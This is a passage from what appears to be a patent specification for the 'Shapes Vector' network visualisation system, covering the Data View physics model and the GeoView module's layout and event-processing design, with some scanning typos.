• 2. Three particular abstraction layers of interest are those concerned with first-order logic, possibilistic logic and probabilistic logic.
• 3. Agents located within a layer of the architecture are prohibited from interacting with agents within the same layer (ie. No peer-to-peer communication).
• 4. Agents located within a layer of the architecture may communicate with agents located in the layer immediately below that layer (if such exists) and/or agents located in the layer immediately above the layer (if such exists).
• 5. The architecture may incorporate a Knowledge Base in which persistent information resides.
• 6. Communication between agents must always be represented in terms of the ontology sandwiched between the sender and receiver's layer. Communications must be context-free with respect to that ontology.
• 7. Agents within the architecture may operate across a time-window, ie, a temporal region of current consideration. A user may dynamically alter parameters of an agent's time-window.
• 8. Third party knowledge processing tools (agents) may be easily wrapped and inserted into the architecture. The ontologies present within the framework ensure that only relevant knowledge transfer takes place between such elements and other agents.
PART 3 DATA VIEW SPECIFICATION 1. Data View Specification
Data View is briefly discussed in Part 1 Section 3.3 of the Shapes Vector Overview, in this specification. The following is a preferred specification of its characteristics.
1.1 Universe
• a universe has a variable maximum radius and contains any number of virtual objects.
• there may be multiple universes.
• the number of universes can be dynamically adjusted using append, insert, and delete operations specified via the user (human or appropriately programmed computer).
• universes are identified by unique names, which can be either auto generated—a simple alphabetic sequence of single characters, or can be specified by the user when appending or inserting universes dynamically.
• to assist in simplifying the display, nominated universes can be temporarily hidden. However all force calculations and position updates continue to occur. Hidden universes are simply temporarily ignored by the rendering phase of the application. A universe is then not human observable.
• a universe can be represented as a two-dimensional plane (in the embodiment a circle), but it is subject to selective zoom and synthetic strobes in a similar fashion to Geo View which may provide a third dimension elevation.
• there are at least two possible starting states for a universe:
• the big bang state in which all objects are created in the centre of the universe;
• the maximum entropy state in which all objects are evenly distributed around the maximum radius of the universe.
• a universe maybe rendered with a circular grid, with identifying labels placed around the perimeter. The number of labels displayed equidistantly around the perimeter can be specified statically or dynamically meaning those labels can be fixed or move in concert with other changes.
• multiple universes are rendered vertically displaced from each other. Inter-grid separation can be dynamically changeable via a control mechanism, such as a socket to be discussed later.
• separation between grids can be specified either globally using inter-grid size or for specific grids as a distance from adjacent grids.
• different universes can have different radii, and their grids can be drawn with different grid sizes and colours.
• all initial settings for grid rendering are to be specified through the MasterTable; These include grid size, inter-grid separation, grid colour, and grid (and hence universe) radius for each universe.
• grid settings (radius, number of radii, number of rings, intergrid spacing) can be altered dynamically via the user.
• object positions are clamped to constrain them within the universe radius.
As a result of this:
When an object located at the edge of the universe experiences a repulsive force that would place it outside the universe (forces between virtual objects will be discussed later in the specification), the object is constrained to stay within the universe so that the object slides along the rim of the universe away from the source of the repulsive force. Forces that tend to draw objects away from the rim towards the interior of the universe result in typically straight-line motion towards the source of attraction.
• the user may specify which virtual objects or sets of virtual objects are in a particular universe using an object selector, and this may dynamically change using append or replace operations on existing specifications.
• if a user replaces the specification of the destination universe for objects matching a particular object selector, then the objects will move from the universe they were originally placed in as a result of this specification to the new universe. Likewise if a user appends a new destination universe specification, then all objects in existence that match the associated object selector will appear in the new universe in addition to wherever they currently appear.
• in all cases where objects are moved between or duplicated to universes, all force interactions, phantoms, interaction markers and radius of influence displays will be updated to reflect this fact.
Force interactions are updated so they only occur between objects in the same universe.
Phantoms are moved/duplicated along with the parent primary object.
Interaction markers are moved/duplicated to remain connected to the object.
Radius of influence displays are duplicated if necessary.
1.2 Objects
• an object has a set of attributes (consisting of name, value pairs) associated with it.
• an object has a two sets of references to other objects with which it interacts, named its mass interaction set and charge interaction set. Events or other external mechanisms modify these two sets.
• an object can have further sets of references to other objects. These sets have names specified at run-time by events and can be used to visualise further interactions with other objects using markers (see section 1.7 in this part of the specification).
• an object can have further sets of references to other objects that are used in building aggregate objects—see section 1.3 of this part of the specification for details.
• an object stores values for mass and charge for each flavour (a term explained later in the specification) it possesses.
• an object may inhabit one or more universes, and this relationship can be displayed using markers.
1.3 Aggregate Objects
• objects can be aggregated to form a composite.
• each aggregate object has one primary (the parent or container) object, and zero or more secondary objects (the children or containees).
• aggregate objects cannot aggregate hierarchically.
• determination of container—containee relationships occurs on the basis of “contains” and “contained-in” network object attributes. These relationships are stored in a database and are always kept up to date and consistent with the latest known information. This means any new information overrides pre-existing information. For example:
• If an attribute indicates A contains B, then it must be ensured that all relationships where B is a container are removed from the database as they are no longer valid since B is now a containee. The same attribute A contains B also indicates that A can no longer be a child of another object, since it is now a container, and so all those relationships are removed from the database. Finally the relationships “A contains B” and “B is containee of A” are added to the database.
• to avoid processing overheads, the actual relationships of objects in the display are not updated to reflect the state of the relationship database until an object is re-instantiated—usually by being moved/duplicated to another universe.
• the aggregate object is treated as a single object for the purposes of force and velocity determination, interaction marker, radius of influence, and phantom displays (subject to the considerations set out below).
• when a new object comes into existence in a universe (either as result of an event being received, or as result of dynamic adjusting of destination universe specifications), it can either become a primary in a new aggregate group, or enter the universe as a secondary in a pre-existing group depending on the containment/containee relationships in force at the time.
• if a new object enters a universe as a primary in a newly created aggregate, it will attempt to determine which other objects in the universe should be adopted to become secondaries. The adoption occurs when another object (potential adoptee) is located that is a containee of the new object (according to the relationship database). When the potential adoptee is a primary in an aggregate with secondaries, the secondaries are evicted before adopting the primary. The evicted secondaries are now inserted into the universe using the insertion policy in force, and they in turn determine potential adoptees and adopt where possible as described.
• the summed masses and charges (section 1.5 in this part of the specification) of all objects within an aggregate are used for force/mass calculations.
• each individual element in an aggregate maintains it's own mass, and masses of like flavour are summed when determining the mass of an aggregate.
• an aggregate object maintains and decays a single total charge for each flavour. When an object joins an aggregate its charges are added to the summed charges of like flavour for the aggregate. When an object leaves an aggregate no change is made to the summed charge as it cannot be known (because of charge decay) what proportion of the total charge is due to the object in question.
• when an object receives additional charge as result of an event, the new charge is added to the total for the aggregate containing it.
• if any object within an aggregate object displays a mass or charge radius of influence (see section 1.9 in this part of the specification), the mass/charge radius is displayed for the entire group, provided the group as an entity has a non-zero mass or charge of the flavour as specified by the radius of influence definition.
• display of phantoms (section 1.7 in this part of the specification) of aggregate objects is driven only by the primary object. The phantoms appear as duplicates of the primary object and trail the primary object's position. If an object matches a phantoming specification, but it happens to be a secondary within an aggregate object then no action is taken.
• if an object (A) within an aggregate is required to display interaction markers (see section 1.8 in this part of the specification), the interaction markers are drawn from the primary of the aggregate object containing A to the primary of the aggregate(s) containing the destination object(s).
• In addition, when interaction markers are drawn in response to picking of an object, they are drawn from the primary of the aggregate containing the picked object to all duplicates in other universes of all destination objects that are in the relationship to the source object that is being visualised by the markers.
• when interaction markers are drawn in response to the matching of an ObjectSelector, markers are drawn from all duplicates of the source aggregate object to all duplicates of the destination aggregate object(s).
• when interaction markers are used to highlight duplicates of the same object in multiple universes, a single multi-vertex marker is displayed which starts at the duplicate appearing lowest in the stack of universes and connecting all duplicates in order going up the stack and ending at the highest appearing duplicate in the stack.
1.4 Object Selector
An object selector specifies a set of objects using set expressions involving set union (+), set difference (−), and set intersection (^) operators. The intersection operator has the highest precedence, difference and union have equal lower precedence. Parentheses can be used to change operator precedence. The set operations have the following operands:
• all—set of all objects;
• class(classname)—set of objects in a given class;
• objects(predicate)—set of objects satisfying a predicate expressed in terms of boolean tests (using and, or, not) on attribute values (e.g. objects(ram >=128000000 && type=sun)) and existence of attributes (e.g. objects(attributes(attributename, attributename, . . . )));. The “and” &&) and “or” (∥) operators have equal high precedence. The “not” operator (!) has lower precedence. Parentheses can be used to change operator precedence
• Flavor(flavorname)—set of objects having all attributes in the given flavour's definition.
• instance(objectid)—set containing object with given object id.
Object selectors are named when defined. This name is used as a shorthand means of referring to the object selector without having to repeat its definition, for example when defining an action on the basis of an object selector.
Object Selectors can be defined via a control port, or via a start-up setting, currently stored in the ApplicationSettings part of the MasterTable file.
1.5 Mass, Charge and Flavours
There exist different flavours of mass and charge.
A flavour is defined by the user as a collection of five-tuples, each defining the flavour with respect to a particular class of objects. The tuple consists of flavour name, object class (or all), attributes expression-listing attributes which must exist, formula for mass and formula for charge. There may be multiple such tuples with the same flavour name, which together define a flavour for multiple classes of objects. The formulae are used to calculate the amount of mass or charge of the flavour, which the object possesses, and they are arithmetic expressions involving object attribute value termns. Note that it is a semantic error for the attributes expression not to include attributes which feature in the mass or charge formulae. For example:
Flavour {
Strawberry,
Computer,
Attributes [runs ram data_rate_in data_rate_out],
ram/1024,
data_rate_in + data_rate_out;
}
If the result of evaluating a mass formula is less than a small positive number (ε) then the value used for the mass in calculations should be ε.
An object may have an amount of flavoured mass or charge if there is a corresponding definition of the flavour for the class of object and the object satisfies the attributes expression for that flavour.
Charge may be set to decay (at a particular rate) or accumulate (ie. a rate of zero) on a per flavour basis. The decayfunction can be set to one of a fixed set (exponential, linear and cosine) on a per flavour basis.
Mass and charge may each have a radius of influence specified on a per flavour basis. Objects that fall within the respective radii of an object may generate a force on the object as a result of their mass or charge respectively, and objects that lie outside this region have no influence on the object.
The radii of influence for objects may be graphically depicted at the user's discretion. Note that multiple radii may apply due to different radii for mass and charge and for different flavours of the same.
When an event arrives that affects one of the attributes listed in a flavour definition, then the object's mass and charge are to be recalculated using the arithmetic expressions specified in said flavour definition. The newly calculated mass will replace the existing mass, and the newly calculated charge will be added to the existing charge.
In addition there are special considerations relating to mass/charge/flavour and aggregate objects. See section 1.3 in this part of the specification regarding those.
1.6 Forces
There are two types of forces acting on objects in the universe, gravitational (as a result of the mass of an object) and electrostatic (as a result of the charge on an object).
The gravitational force is repulsive and the electrostatic force is attractive.
Forces are two-dimensional vectors and are additive.
The velocity of an object is proportional to the force acting on it divided by its mass (ie. acceleration is disregarded). Note that flavours need to be taken into account in this calculation.
There is a variable maximum velocity which applies to all objects in a universe.
Only masses and charges of the same flavour may produce a resultant force.
The velocity due to gravitational forces of an object is contributed by the gravitational forces which result from each of the objects in its mass interaction set (using the mass value for each relevant flavour) which are also within the radius of influence for mass. These forces are divided by the correspondingly flavoured mass of the object to arrive at velocities.
The velocity due to electrostatic forces of an object is contributed by the electrostatic forces which result from each of the objects in its charge interaction set (using the charge value for each relevant flavour) which are also within the radius of influence for charge. These forces are divided by the correspondingly flavoured mass of the object to arrive at velocities.
The net velocity of an object is the sum of the gravitational and electrostatic velocities for that object.
1.7 Phantoming
When selected, objects will be able to display a history of previous positions by displaying a ‘phantom’ at a number of previous locations.
Objects for which phantoms are drawn are selected using named Object Selectors.
Display Parameters for phantoming can be set in the ApplicationSettings part of the MasterTable or via a control socket, and are associated with a previously defined Object Selector.
Display parameters include the time spacing between phantoms, the display style (eg transparent or wire frame), and the number of phantoms to show.
Multiple Object Selectors and associated display parameters can be used to display any desired combination of phantoms.
In addition there are special considerations relating to phantoming and aggregate objects—see section 1.3 in this part of the specification for those.
1.8 Markers
Interaction markers may be used to highlight interaction between weakly interacting objects.
Interaction markers make use of named Object Selectors to determine which objects have interaction markers displayed.
Interaction markers may span multiple universes.
Display parameters for markers can be set in the ApplicationSettings part of the MasterTable or via the control socket, and are associated with an interaction type.
Display parameters for markers include line style, width and colour. Each interaction type is drawn with its own independently specified line style width, and colour.
Marker—the user intellectively picking an object on the display can optionally toggle the display.
Multiple Object Selectors and associated display parameters can be used to display any desired combination of markers.
In addition there are special considerations relating to interaction markers and aggregate objects—see section 1.3 in this part of the specification for those.
1.9 Radius of Influence Display
Radius of influence can be visualised for selected objects as transparent disks.
Objects for which radius of influence are displayed are selected using the Object Selector mechanism.
Display parameters include which flavour to display the radius for, whether the charge or mass radius is to be displayed, the colour of the displayed disk, and the transparency level of the displayed disk.
Display parameters can be set in the ApplicationSettings part of the MasterTable or via the control socket, and are associated with a previously defined Object Selector.
Multiple Object Selectors and associated radius of influence display parameters can be in use simultaneously to display any desired combination of radii.
In addition there are special considerations relating to radius of influence displays and aggregate objects—see section 1.3 in this part of the specification for those.
1.10 Pulses
A flavoured pulse of charge or mass may be applied at any location within a universe, and has influence over the entire universe. That is, a flavoured pulse is applied without regard to the mass and charge radii associated with its flavour.
1.11 Irregular Functions
A user may “shake” a universe at any particular moment, by either:
• perturbing each object by a random amount (under a variable maximum)
• ; -randomly placing each object within the universe.
A user may reproduce the start state of a universe at any particular moment, as at least either the big bang or maximum entropy state.
PART 4 GEO VIEW SPECIFICATION 1. Introduction
1.1 Identification
This document relates to the GeoView Module for the Visuals Sub-system of Shapes Vector.
1.2 System Overview
1.2.1 General
Shapes Vector is a system, which in the embodiment used to illustrate its principles and features provides an analyst or system administrator with a dynamic real-time visualisation of a computer or telecommunications network. Shapes Vector is an advanced 3-D graphical modelling tool developed to present information about extended computer systems. Shapes Vector places users within a virtual world, enabling them to see, hear and feel the network objects within their part of this world. The objects may be computers, files, data movements or any other physical or conceptual object such as groups, connected to the system being navigated. Seeing an object with a particular representation denotes a class of object and its state of operation within its network.
Just as familiar objects make up our natural view of the physical world, so too a computer network is made up of physical objects, such as computers, printers and routers, and logical objects, such as files, directories and processes.
Shapes Vector models network objects as 3D shapes located within an infinite 3D universe. An object's visual attributes, such as colour, texture and shading, as well as its placement and interaction with other objects, provide the user with significant information about the way the real network is functioning.
1.2.2 Geo View Module Scope
GeoView, along with DataView, is one of the ways in which the user can view, and interact with, the data produced by the Agents Sub-system. Each of these views is defined by certain characteristics that allow it to provide a unique representation of the data. GeoView has an emphasis on the physical objects with a geographic perspective. This means it places a heavy importance on objects related to the physical rather than the logical world, and that these objects tend to be laid out in a traditional geographic manner.
While objects such as computers, printers and data links are of prime importance to GeoView, logical objects such as network traffic, computer processors, and user activity are also displayed because of the relationships between the physical and logical objects.
FIG. 1 shows the library dependency relationship between the GeoView module and other modules. The full relationship between the Sub-systems and between this module and other modules of this sub-system, is shown in the System/Sub-system Design Description.
1.3 Overview
This part of the specification provides a Detailed Design for the GeoView Module of the Visuals Sub-system (CSCI) of the Shapes Vector Project.
This module encompasses the following sub-components:
• Layout Hierarchy
• Layout Structure Template Library (LSTL)
The content of this part is based on the Data Item Description (DID) DI-IPSC81435, Software Design Description (SDD), from the US Military Standard MILSTD498 [1] using MIL-STD498 Tailoring Guidebook [2] for the development project.
Detailed design information in this document is based on the technical content of other parts of this specification.
2. Referenced Documents
2.1 Standard
• [1] MIL-STD498, Military Standard—Software Development and Documentation, US Department of Defence, 5 Dec. 1994.
• [2] MIL-STD-498 Overview and Tailoring Guidebook, 31 Jan. 1996.
3. Module-wide Design Decisions
This section presents module-wide design decisions regarding how the module will behave from a user's perspective in meeting its requirements, and other decisions affecting the selection and design of the software components that make up the module.
3.1 Design Decisions and Goals of Geo View
GeoView is designed with only one executable.
GeoView has logically divided sub-components: Layout Hierarchy and Layout Structure Template Library (LSTL).
Unless otherwise specified, the programrning language used in GeoView is C++. The following list identifies the design concepts that characterise GeoView:
• 1. Physical: Due to the focus on the physical world, more importance is placed on physical objects and less importance on logical objects.
• 2. Geographic: The default mechanism for placing objects in the world is to map them according to a physical location. If this is not possible then other methods must be used.
• 3. Shape: Shape is used to identify unique objects. Different object types will have different shapes while similar object types will have similar shapes.
• 4. Motion: Movement of objects (translation, rotation) typically represents activity in the world. A moving packet represents traffic flow while a spinning process shows that it is active.
• 5. Sound: Sound is linked to movement of objects or a change in visual appearance or a change in state.
• 6. Feel: Feel or touch senses can be used to provide additional emphasis to events linked to movement of objects where for example object come into close proximity suddenly.
4. Module Architectural Design
At the architectural level, the sub-systems (CSCJs) are decomposed into modules. At the detailed design level, the modules are decomposed (if applicable) into executables or libraries. This section describes the module architectural design.
The major architectural decomposition of GeoView comprises the following component:
• GeoView General (Section 4.1.1 of Part 4)—contains all the classes for the support of the View, including interfaces with WorldMonitor for handling incoming events from Tardis, MasterTable for input and output of master tables, and LayoutHierarchy for handling the layout of network objects within the world.
and sub-components:
• LayoutHierarchy (Section 4.1.2 of Part 4)—responsible for the node store and data structure of GeoView. It places graphical (renderable) objects into the scene graph based on layout rules specified in the MasterTable. It uses the LSTL to manage structure nodes; and
• LSTL (Section 4.1.3 of Part 4)—responsible for placing network objects (nodes) into layout structures such as rings, stars, and lines. The LSTL is a generic library with its components being templates. The layout structures covered include:
• Tree, Graph, Line, Star, Matrix, Rectangle and Ring.
FIG. 15 shows an overview diagram for GeoView. The component/sub-components are described at an architectural level in the sections below. Detailed design of the sub-components LayoutHierarchy and LSTL is included in Section 5. GeoView uses the Layout Structure Template Library (LISL) framework by instantiating it with the LayoutHierarchy node type.
4.1 Geo View Functional Design
4.1.1 Geo View General
This section is divided into the following architectural design sub-sections:
• Event Handling
• MasterTable Functionality
• CCI Interface
• GeoView Processing and Caching
4.1.1.1 Event Handling
The World Monitor receives events describing NetworkObjects from the Tardis process, via shared memory as shown in FIG. 15. Each recognised network object has its own event type, with event types coming in the six variants shown in Table 1.
TABLE 1
Network Object Event Handlers
Event Type Variant Event Handler Functionality
AddObject Create a new NetworkObject
AddObjectAttributes Add new attributes to an existing
NetworkObject
ReplaceObject Replace a NetworkObject
completely
ReplaceObjectAttributes Replace a NetworkObject's
attributes
RemoveObject Temporarily removes a
NetworkObject (tagged
for deletion which cannot be
undone)
Purge zombies Permanently removes a
NetworkObject
Currently the handlers for AddObject and AddObjectAttributes are identical, both adding an object if none exists, and merging in the associated attributes as well.
4.1.1.2 MasterTable Functionality
The MasterTable is a hierarchical repository used for mapping network object attributes to visual attributes. In operation, when a visual attribute is required, an address is constructed using the application name, the object type, and the network object. The MasterTable is queried using this address and a list of matching attributes is returned. These could include direct attribute settings, or attribute tests, where for example an object might become a particular colour if the value of a specified network attribute of the NetworkObject in question is greater than a given constant. The MasterTable also contains the Layout Rules determining what layout-structure objects are placed in.
4.1.1.3 CCI Interface
The Component Control Interface (CCI) consists of textual commands sent via a socket that can be used to drive various portions of the application. Each Shapes Vector process usually has one or more CCIs, with each CCI being attached to a logically distinct portion of the application. For example, GeoView has a CCI for controlling the renderer, one for the SVWorld (shown as Virtual World on FIG. 1), which currently deals mainly with selective zoom and object selectors, and one for the World Monitor that gives access to commands relating to processing of incoming events.
When a command arrives on the CCI socket, the CCI thread notifies the main thread that it wants access to the mutex. The next time the main thread checks (in SV_View::postTraverseAndRender) it will yield to the CCI thread. It then performs all necessary processing before relinquishing the lock.
The notification mechanism is embodied in a class called ControlMutex that resides in the svaux library. It allows a higher priority thread to simply check the value of a flag to see if anyone is waiting on a mutex before relinquishing it, rather than performing a costly check on the mutex itself. Currently the ControlMutex is not used in processing, rather the CCI is checked once per renderer cycle in SV_View (the base view).
FIG. 16 shows the processing within the CCI thread as part of the GeoView thread diagram.
4.1.1.4 GeoView Processing and Caching
The basic structure of processing in GeoView is for external events to arrive detailing the existence of world objects, facts known about them and their relationships to other world objects in the form of attributes. The virtual depiction of these real world objects occurs graphically via leaf nodes in the GeoView universe where visual attributes for each type of possible world object is specified via the Master Table. Such visual attributes may be specified on the basis of attributes of the world objects.
In order to determine where to place these leaf nodes, the layout rules from the MasterTable are used. These layout rules specify attachment, containment and logical groupings of leaf nodes on the basis of their attributes.
To enable this, the building of the GeoView world is broken into the following five phases, with phases 2-5 referred to as the Layout′ process:
1. Event Insertion and Removal
Add or remove attributes arrive encapsulated within network objects via events.
New leaf nodes in the layout hierarchy are created where necessary attributes and inversed attributes are added to, or removed from, leaf nodes.
Caching for the next four processing steps (i.e. Layout) occurs.
2. Leaf Building
Graphical objects are built according to their visual mapping's in the MasterTable.
3. Layout Rule Application
Layout-structure, attached-to and located-in rules from the MasterTable are applied to the objects. Any necessary grouping layout structures are created and parent-child relationships are formed that will dictate positioning, attachment, and containment.
4. Leaf Edge Creation
New edges between leaf nodes are created.
5. Object Relative Placement
Both leaf nodes and structure nodes are placed on the basis of their hierarchical relationships (attachment and containment) in the layout hierarchy as well as their parent structure nodes.
For efficiency, each phase of processing is associated with caching certain operations such that repeat operations do not occur. The GV_WorldMonitor turns off the layout flag before the insertion of a batch of events into the root of the GeoView layout hierarchy After a batch of events has been inserted, the layout flag is turned back on, and the entire batch is processed fully This procedure represents the start point for caching optimisation in layout hierarchy
If such a caching strategy were not employed, processing time may be greatly affected. This is due to relative placement using bounds information. For example, consider Computer A with 20 child modems, each of them attached-to it. As the sub-structure for attached-to objects (for example ring) is called for EACH of the child modems, a bounds radius change will occur Since this may affect the overall 3 composite structure's bounds radius (i.e. the parent Computer A's bounds) then the relative placement algorithm must be called for the Computer A's parent structure. This occurs in a recursive manner to the root layout structure. Without caching, the relative placement of Computer A would need to occur a minimum of 20 times. By caching the fact that Computer A requires placement (on level base-2 of the layout hierarchy tree) it can be guaranteed that Computer A's relative placement is called a maximum of once only processing this occurs.
TABLE 2
provides an overview of which operations are cached and at what stage of
Level Processing Caching
1 Object insertion and removal Each leaf node created or altered
2 Object building and layout Each structure node requiring
placement
3 Edge creation Leaf nodes requiring edge
updates
4 Base level structure placement Base Level-I structure
placement, leaf
nodes requiring edge updates
5 Base Level-I structure Base Level-2 structure
placement placement, leaf
nodes requiring edge updates
. . . . . . . . .
N Top Level Structure Placement Leaf nodes requiring edge
updates
N + 1 Leaf nodes requiring edge . . .
updates
4.1.2 LayoutHierarchy
The LayoutHierarchy is the view specific node store and system of data structures that implement GeoView. It consists of a hierarchy of classes that combine to form a logical object hierarchy of graphical and grouping objects that parallel the structure of the Scene Graph.
4.1.2.1 Class Hierarchy
The class relationship diagram for Layout Class Hierarchy is shown in FIG. 17
The Layout Hierarchy data structure is a hierarchical, arbitrarily Nodes represent either logical grouping constructs (i.e.depthed tree. LH_SNodes, LH_CoordGroupSet or LH_CoordGroups) or graphical objects in the GeoView universe (i.e. LHLeaf).
All classes inherit from the abstract base class LU_Node. The LU_Root, LH..EdgeSet and LWCoordGroupSet classes each represent singleton instances.
LH_Node inherits from Cfltem and contains the base interface for all classes in GeoView. This interface includes the ability to set and check placement flags that indicate the type of an object add and remove objects from the scenegraph, look up operations in the MasterTable and placement specific functions.
LH_Root provides the instance for the root of the Geo View universe and is the core interface to the Layout Hierarchy data structure. It allows the insertion of events into the World, the look up of all nodes, the application of layout rules, object composition and placement caching for speed up.
LH_Leaf represents the actual visual objects in GeoView. It provides an interface for altering any visual aspects of objects, as well as an interface for maintaining any attachment or containment relationships an object may have.
LHEdgeSet maintains the set of connection lines in the World. It also has provision for temporarily turning lines on and off.
LH_CoordGroupSet is a singleton container class for LH_CoordGroup(s) that is itself a container for layout structures and/or leaf objects. It groups those objects together for which specific location data is known, and maintains them positioned as close as possible to that location.
LH_SNode is the abstract parent class for the layout structure classes. It provides the interface to the layout structures allowing insertion and deletion of objects, calling on the relative placement of objects and the maintenance of graph edges and location data for layout structures.
The layout structure classes themselves are grouping constructs for leaf objects and provide the interface to the LSTL generic layout structures. These can be instantiated with generic objects specific to views and the objects are placed on the basis of the traits particular to the layout structure (e.g. Star or Graph). Grouping rules are specified in the MasterTable.
4.1.2.2 Logical Object Hierarchy
FIG. 18 shows Logical Object View of the types of parent-child relationships allowable in the data structure and how these classes work together to form the logical object view of the GeoView visual system, which is also hierarchical.
The three singletons of Root, CoordGroupSet and Top Level Structure form level 0 and level 1 of the layout hierarchy tree.
A Root instance forms the parent of the tree that represents the logical structure and interconnections between objects (LWLeaf) and grouping constructs (children. of LU_CoordGroupSet or LH_SNode in FIG. 17). The interconnections of these objects and groups are mirrored in the Scene Graph, which is the interface to the renderer visual system.
At the second level of the hierarchy there are two singleton instances, viz, the Top Level Structure and the CoordGroupSet. All objects with location data or layout structures that have inherited location data are placed into a CoordGroup within the CoordGroupSet representing the geographic region given by the location. Visual objects when they first enter the world are placed into the Top Level
Structure, which is the base layout structure of the world. CoordOroups contain nodes with specific location data, whilst all nodes beneath the Top Level Structure undergo relative placement based on the layout structure of which they are a child.
The Top Level Structure works as a default layout structure for leaf nodes that have no relevant layout rules specified in the MasterTable. The Top Level Structure is special in that it is the only structure that may itself directly contain a child layout structure.
Structures are layout structures that are children of the Top Level Structure, whereas sub-structures are Layout Structures that are used to group leaf nodes that are located-in or attached-to other leaf nodes. Note that the concept of attachment and containment are the cause of the arbitrary depth of the layout hierarchy tree. Intuitively arbitrary objects may be attached to one another and similarly objects may be placed inside of other objects to, effectively, arbitrary depth.
The grouping objects are akin to the C3DGroup objects and the leaf nodes are akin to the C3DLeaf objects of the Scene Graph. The parent-child relationships (edges of the layout hierarchy) are mirrored in structure in the Scene Graph, thus the locations of children may be specified relative to the parent object. For more detailed design of C3D.
4.1.2.3 Processing
This section provides a detailed description of the processing that occurs in the phases of building the Geo View universe outlined in Section 4.1.1.4 of this part. Description of the individual class methods is included in Section 5 of this part.
1. Root Initialisation
The singleton instances of LItEdgeSet and LH_CoordGroupSet are created during the initialisation of the Root (LitRoot) of the layout hierarchy The Top Level Structure of the hierarchy is also created, which acts as the default structure node for leaf nodes without parent structures. The root is itself created during the GeoView initialisation. Each of the singletons are children of Root, and the Root itself is inserted into the Scene Graph, effectively becoming the Scene Graph parent of the layout hierarchy
2. Event Insertion and Removal
In this phase, entire objects or attributes of objects are added or removed from the layout hierarchy data structure. The four operations are ADELOBJECT, ADD_ATTRIBUTES, REPLACE OBJECT and REPLACE_ATTRIBUTES. This is the initial phase and is instigated by the insertion of events by World Monitor.
Object attributes may be inversable. This means that the attribute relates to two objects, and can be read in a left to right or right to left manner. For example, for Object A and Object B, if we have A is_contained_within B, then the inverse of this is B contains A. When such attributes are added to an object the inverse of the relationship is added to the secondary object. If attributes are removed, then such inversed attributes must also be removed from the secondary objects.
Attributes are added to, or removed from, objects that correspond to leaves in the layout hierarchy class structure and which correspond to graphical objects in the GeoView universe. These leaf nodes are then cached for further processing at the end of the insertion of a batch of objects and attributes.
Section 5 of this part contains method descriptions for the following cases:
• Insertion;
• Adding Inverse Attributes;
• NetworkObject Insertion and Removal; and
• Attribute Insertion
3. Leaf Building
In this phase, graphical objects (leaves) are built according to their visual mappings in the MasterTable.
The LH_Leaf class has an aggregation relationship (‘contains’) to the CV3DObject class, which in turn is derived from the Generic3DObject class. The 3D object class is a descendant of the C3D object classes (see reference [6]) that implement rendering. When visual information about a Layout Hierarchy object (leaf node) arrives via events it is passed on to the respective CVjDObject instance.
4. Layout Rule Application
In this phase, the parent-child relationships of leaf nodes to structure nodes and each other are made on the basis of rules in the MasterTable. The structure nodes that are required to perform placement of leaf nodes is cached, i.e. data structures detailing the hierarchical relationship of objects is built, but not physically yet layed out.
Section 5 of this part contains method descriptions for the following cases:
• Apply Layout Structure Rules to Objects;
• Handle Generic Layout Structures;
• Handle Instance Matches;
• Apply Attached-to Rules to Objects;
• Apply Located-in Rules to Objects;
• Find Satisfied Rules; and
• Compose Objects.
5. Leaf Edge Creation
In this phase, all edges in the GeoView Universe are placed in the LH_EdgeSet singleton when they are created. The location of their endpoint's are not maintained in the traditional hierarchical relative fashion via transform groups in the Scene Graph since they do not conceptually have a single location, but span two. As a result of this, each time a node or subtree in the layout hierarchy tree changes, each edge must have its position updated.
Section 5 of this part contains method descriptions for the following cases:
• Create Edges;
• Create Edge;
• Update Edges;
• Add Edge; and
• Add Graph Edge.
6. Object Relative Placement
In this phase, each level of the layout hierarchy tree undergoes placement by caching objects requiring placement into the level above, until the root of the layout hierarchy tree is reached. In this way, we can ensure that relative placement is called a maximum of once only on each structure in the entire layout hierarchy.
The parent layout structure of an object places it according to the placement algorithm of that structure. For example, a ring layout structure places its child objects spaced evenly around the circumference of a circle. Each layout structure has settings particular to its layout shape.
4.1.3 Layout Structure Template Library (LSTL)
This section describes the Layout Structure Template Library (LSTL), which consists of a set of C++ formatting classes. A formatting class is one which contains pointers to other objects (T) and performs some kind of formatting on those objects. The LSTL classes are responsible for placing the objects they are given into layout structures such as rings, stars, lines etc. The LSTL is a generic library and all components of the LSTL are templates.
The LSTL contains the following template classes:
• GenericGraph<T>
• GenericLine<T>
• GenericMatrix<T>
• GenericRing<T>
• GenericStar.cT>
• GenericRectangle<T>
• CenericTree<T>
Each of these classes is a template, and can be instantiated to contain any type of object. The only restriction on the object is that it must supply the required interface functions as described in Section 5. Each of the classes in the LSTL described in the sub-sections below defines an interface as described in Section 5 of this part.
4.1.3.1 GenericGraph
This layout structure places the objects in a graph, based on edge connections between those objects. The graph algorithm attempts to situate objects by spatially representing their interconnections whilst minimising edge crossovers. The user can specify the following settings:
• NODE SEPARATION FACTOR: This value indicates the amount of separation between nodes in the graph (horizontal spacing) relative to a unit value of 1.0.
• RANK SEPARATION FACTOR: As similar to node separation factor this value represents the separation between ranks (vertical spacing).
• ORIENTATION: This value determines whether the graph is orientated top-to-bottom or left-to-right.
The default node separation factor to rank separation factor is a ratio of 1:3. FIG. 19 shows the Object Layout Structure of how the above settings relate to the graphs produced.
4.1.3.2 GenericLine
This layout structure places the objects in a line. The user can specify the following arguments:
• AXIS: This determines to which axis (x, y or z) the line will be parallel.
• LINEAR DIRECTION: This determines whether the line extends along the axis in a positive or negative direction.
• ORIGIN: This determines whether the origin is located at the front back or centre of the line.
• SEPARATION: This is the amount of spacing the algorithm leaves between each object in the line.
FIG. 20 shows what the DIRECTION and ORIGIN line will look like with various GenericLine combinations
4.1.3.3 GenericMatrix
This layout structure places objects in a matrix. By default objects are added into the matrix in a clockwise spiral as shown below: 24 9 10 11 12 23 8 1 2 13 22 7 0 3 14 21 6 5 4 15 20 19 18 17 16
The user can specify the following arguments:
• WIDTH_SEPARATION: This is the amount of space in the X axis that is left between objects in the matrix.
• DEPTH_SEPARATION: This is the amount of space in the Z axis that is left between objects in the matrix.
• DELETE_POLICY: This determines what the algorithm will do when an object is removed from the matrix. It can either leave a gap, fill in the gap with the last object or shuffle back all of the objects after the gap.
• ORIGIN_POLICY: Determines where the true centre of the matrix is located, either where the first object in the matrix is placed or at the true centre.
4.1.3.4 GenericRing
This layout structure places objects in a ring. The user can specify the following arguments:
• ANGULAR DIRECTION: This determines the direction in which objects are placed on the ring. It can be either clockwise or anti-clockwise.
• RADIUS: This is a minimum radius for the ring. The algorithm will determine a dynamic radius based on object size and separation and if it is less than the user specified radius it will not be used. If it is greater it is used rather than the user specified one.
